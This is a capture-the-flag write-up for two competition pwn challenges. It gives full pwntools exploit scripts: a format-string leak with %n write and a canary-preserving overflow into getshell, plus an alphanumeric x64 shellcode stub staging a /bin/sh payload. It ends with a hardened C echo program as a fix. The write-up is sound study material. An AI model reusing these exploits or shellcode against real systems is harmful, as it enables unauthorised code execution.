
writeup


2022-11-13

<h1>🌓echo</h1>
<h2>🌙Analysis</h2>
<p>Checking the protections with checksec:</p>
<p><img src="https://pic1.imgdb.cn/item/6370b47616f2c2beb1d88caa.png" alt="" /></p>
<p>All protections are enabled.</p>
<p><img src="https://pic1.imgdb.cn/item/6370b52216f2c2beb1da3d57.png" alt="" /></p>
<p>The program contains two vulnerabilities: a printf format-string bug and a buffer overflow through scanf's <code>%s</code>.</p>
<p><img src="https://pic1.imgdb.cn/item/6370b60e16f2c2beb1db703e.png" alt="" /></p>
<p>The program also contains a function that directly spawns a shell (getshell).</p>
<p><img src="https://pic1.imgdb.cn/item/6370b5af16f2c2beb1db0ab8.png" alt="" /></p>
<p>Running it, however, turned out to require libc 2.34, which I don't have, so I had to work blind. First, the goals:</p>
<ul>
<li>Obtain the ELF load base address</li>
<li>Obtain the canary value</li>
<li>Overwrite the function's return address with the address of the getshell function</li>
</ul>
<p>The first two goals can be achieved with the format string's arbitrary read.</p>
<p><img src="https://pic1.imgdb.cn/item/6370b6d616f2c2beb1dc7287.png" alt="" /></p>
<p>The canary value and the address of a function inside the ELF are easy to find; their format-string offsets are 19 and 21 respectively.</p>
<p><img src="https://pic1.imgdb.cn/item/6370b74f16f2c2beb1dd389a.png" alt="" /></p>
<p>What remains is to overwrite the global variable can_level with a non-zero value, which is done with the format string's arbitrary write. Note that printf stops at "\x00", so the address of can_level has to be placed after the format directive rather than in front of it.</p>
<h2>🌙Exploit</h2>
<pre><code class="language-python">from pwn import *
# context.log_level = 'debug'
# o = process('./chall')
o = remote('chal.hkcert22.pwnable.hk', 28037)

# Stage 1: leak the canary (offset 19) and an ELF address (offset 21) with %p
payload = b"%19$p,\x00 %21$p"
o.recvuntil(b'Input:')
o.sendline(payload)
o.recvuntil(b'0x')
canary = int(o.recv(16), 16)
o.recvuntil(b'0x')
elf_addr = int(o.recv(12), 16)
log.info('canary: ' + hex(canary))
log.info('elf_addr: ' + hex(elf_addr))

# Offsets inside the PIE binary
elf_base = elf_addr - 0x135A
getshell = elf_base + 0x1264
can = elf_base + 0x401C

# Stage 2: set can_level to non-zero with %n; the address follows the
# directive because printf would stop at the null bytes inside it
payload = b'aaaa%7$n' + p64(can)
o.recvuntil(b'Input:')
o.sendline(payload)

# Stage 3: overflow the buffer, keep the canary intact, return into getshell
payload = b'a' * 104 + p64(canary) + b'a' * 8 + p64(getshell)
o.recvuntil(b'Input:')
o.sendline(payload)
o.sendline(b'--')
o.interactive()
</code></pre>
<p><img src="https://pic1.imgdb.cn/item/6370c0ff16f2c2beb1eb69f7.png" alt="" /></p>
<h2>🌙Attachments</h2>
<p><a href="https://flowus.cn/c3n1g/share/1c3e32e7-5d64-42cb-9956-3bbf5b5d0e78">https://flowus.cn/c3n1g/share/1c3e32e7-5d64-42cb-9956-3bbf5b5d0e78</a> 【FlowUs 息流】echo.zip</p>
<h1>🌓shellcode-runner2</h1>
<h2>🌙Analysis</h2>
<p><img src="https://pic1.imgdb.cn/item/6370b9ee16f2c2beb1e11103.png" alt="" /></p>
<p>The challenge is shellcode injection, but the shellcode is restricted to uppercase letters and digits. For an x86 binary alpha3 could generate it directly, but this is an x64 binary, so the shellcode has to be written by hand.</p>
<p>The register values at the moment execution jumps to the shellcode are:</p>
<p><img src="https://pic1.imgdb.cn/item/6370bd9116f2c2beb1e55d44.png" alt="" /></p>
<p>My own idea was to implement a read syscall: rdi only needs to be 0, rsi stays as it is, and rdx just needs to hold a large number. Implementing execve("/bin/sh", 0, 0) would be harder than that, so it is better to use read to overwrite the shellcode; the shellcode written in that second stage then has no restrictions at all.</p>
<p>Implementation of the read syscall:</p>
<pre><code>push rax
pop rcx    # store the shellcode address in rcx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax    # zero rax
xor al, 0x39
xor al, 0x36
push rax
pop rdx    # produce 0xf and store it in rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax    # zero rax
xor DWORD PTR [rcx+rax*2+0x30], edx    # write 0xf at shellcode+0x30
xor al, 0x36
xor al, 0x33
push rax
pop rdx    # produce 0x5 and store it in rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax    # zero rax
xor DWORD PTR [rcx+rax*2+0x31], edx    # write 0x5 at shellcode+0x31; together with the 0xf at 0x30 this forms a syscall instruction
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rdx    # padding so that execution reaches shellcode+0x30
</code></pre>
<p>At the end the registers hold rax=0, rdi=0, rsi=shellcode, rdx=shellcode.</p>
<p>Then just send ordinary shellcode again; remember to pad the front with a number of nop instructions.</p>
<h2>🌙Exploit</h2>
<pre><code class="language-python">from pwn import *
context.arch = 'amd64'
# o = process('./chall')
o = remote('chal.hkcert22.pwnable.hk', 28130)

# Stage 1: alphanumeric stub that ends up executing read(0, shellcode, shellcode)
shellcode = '''
push rax
pop rcx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor al, 0x39
xor al, 0x36
push rax
pop rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor DWORD PTR [rcx+rax*2+0x30], edx
xor al, 0x36
xor al, 0x33
push rax
pop rdx
push rsi
push rsp
pop rax
xor DWORD PTR [rax], esi
pop rax
xor DWORD PTR [rcx+rax*2+0x31], edx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rcx
push rcx
pop rdx
'''
shellcode = asm(shellcode)
print(shellcode)
o.sendline(shellcode)

# Stage 2: unrestricted shellcode behind a nop sled
payload = asm('nop') * 0x50 + asm(shellcraft.sh())
o.sendline(payload)
o.interactive()
</code></pre>
<p><img src="https://pic1.imgdb.cn/item/6370be2916f2c2beb1e6284d.png" alt="" /></p>
<h2>🌙Attachments</h2>
<p><a href="https://flowus.cn/c3n1g/share/8d93197a-8ff0-481c-bb50-1f45aeefcd6d">https://flowus.cn/c3n1g/share/8d93197a-8ff0-481c-bb50-1f45aeefcd6d</a> 【FlowUs 息流】shellcode-runner2.zip</p>
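<p>The two bugs named in the echo section above (an unbounded scanf("%s") and a printf whose format string comes from the input) are fixed at the source by bounding the read and never passing input as the format argument. The C program below is an added illustration written for this page, not the challenge binary's source; the buffer size 104 (taken from the 'a'*104 padding in the exploit), the function names and the reject-on-overlong behaviour are assumptions.</p>

```c
/* Hardened echo: the vulnerable pattern described in the write-up is roughly
 *     char buf[104]; scanf("%s", buf); printf(buf);
 * scanf("%s") has no length bound, and printf(buf) lets the input supply
 * %p/%n directives. Below, the read is bounded and the format is a constant,
 * so "%19$p" is echoed back as text instead of being interpreted.
 * (Constructed example; names and sizes are assumptions, not the challenge code.) */
#include <stdio.h>
#include <string.h>

#define BUF_SZ 104  /* assumed size of the overflowed stack buffer */

/* Copy one untrusted line into a fixed buffer. Returns its length, or -1 if
 * the line (without its trailing newline) does not fit. Rejecting over-long
 * input is preferable to silent truncation, which would hide a probe. */
int read_line_bounded(const char *src, char *dst, size_t dst_sz) {
    size_t n = strcspn(src, "\n");      /* length up to the first newline */
    if (n >= dst_sz) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (int)n;
}

/* Echo the line. A constant "%s" format never treats the data as directives,
 * and the output buffer is bounded as well. Returns 0, or -1 on truncation. */
int echo_safe(const char *line, char *out, size_t out_sz) {
    int written = snprintf(out, out_sz, "%s\n", line);
    return (written >= 0 && (size_t)written < out_sz) ? 0 : -1;
}

/* Both steps together: 0 = echoed, -1 = rejected (too long or truncated). */
int echo_request(const char *raw, char *out, size_t out_sz) {
    char buf[BUF_SZ];
    if (read_line_bounded(raw, buf, sizeof buf) < 0) return -1;
    return echo_safe(buf, out, out_sz);
}

int main(void) {
    char raw[512], out[512];
    while (fgets(raw, sizeof raw, stdin)) {
        if (echo_request(raw, out, sizeof out) == 0) fputs(out, stdout);
        else puts("rejected: input too long");
    }
    return 0;
}
```

<p>GCC's -Wformat -Wformat-security warns about the printf(buf) pattern at compile time, which is the cheapest check to add to a build.</p>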
